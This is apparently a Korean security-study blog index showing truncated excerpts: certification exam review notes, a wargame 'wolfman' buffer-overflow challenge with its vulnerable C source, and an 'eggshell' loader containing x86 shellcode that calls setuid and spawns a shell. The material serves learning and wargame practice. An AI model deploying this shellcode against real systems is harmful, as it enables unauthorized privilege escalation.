전체 글231 보안기사 기출문제 2023 1회 오답노트 기록 SCAN (엘리베이터처럼 왕복), SSTF(가장가까운것부터) BitLocker(exFAT도 지원함, 텍스트파일 형태 복구키 지원, usb 형태 가능) EDR (앤드포인트 단계에서 지속적인 모니터링, 대응 제공. 보안침해 억제/조사/회복) 쿠키 구분자 세미콜론 ; 사용wtmp : 사용자 로그인/아웃, 시스템 셧다운과 부팅 정보. last 명령어 적대적공격 Adversarial Attack (의도적으로 입력 데이터에 노이즈 추가)비주얼 베이직 확장자는 VBS. 내장된 형태는 VBA. 웜 제작 가능. sudoers %그룹명으로 지정. 주석아님! 화이트박스-내부구조와동작 검사. 블랙박스-입력, 출력값만 확인 lsof : 특정 파일에 접근하는 프로세스 목록 확인 SMTP : EHLO는 클라이언트가 .. 2024. 6. 23. 정보보안3 7차시 boforc 사용자의 wolfman 문제 egghunter + buffer hunter#include #include extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc printf("argv error\n"); exit(0); } // egghunter for(i=0; environ[i]; i++){ memset(environ[i], 0, strlen(environ[i])); } if(argv[1][47] !.. 2024. 6. 22. eggshell 추후 분석 vi eggshell.c #include #include #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" //setuid(geteuid()) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\.. 2024. 6. 22. 필수기출1200 ~1200 1061. 디렉터리 리스팅 - 보안설정 오류 1062. XML 조회를 위한 질의문 생성시 검증값처리방법 설계 - 공통 검증 컴포넌트 사용 - 필터 컴포넌트 사용 - 개별 코드에서 입력값 필터링 - 안전한 API 사용 1063. HTTP Smuggling - 하나의 패킷 안에 또 하나의 패킷을 포함하여 밀수smuggling 된 패킷을 해석할 경우 공격이 수행된다 1064. WAF: 응용 프로그램이나 서비스의 입출력 및 액세스 제어 방화벽 MDM: 스마트폰, 태블릿 등 모바일 장치를 관리하는 솔루션 기술 IPS: 네트워크 또는 시스템의 악의적 활동 식별, 정보를 기록, 보고, 탐지된 침입 차단 + MAM : 모바일 기기에 설치된 앱과 데이터를 선택적으로 관리하는 솔루션. 개인의 영역과 기업의 영역이 나뉨 1.. 2024. 6. 20. 이전 1 ··· 22 23 24 25 26 27 28 ··· 58 다음
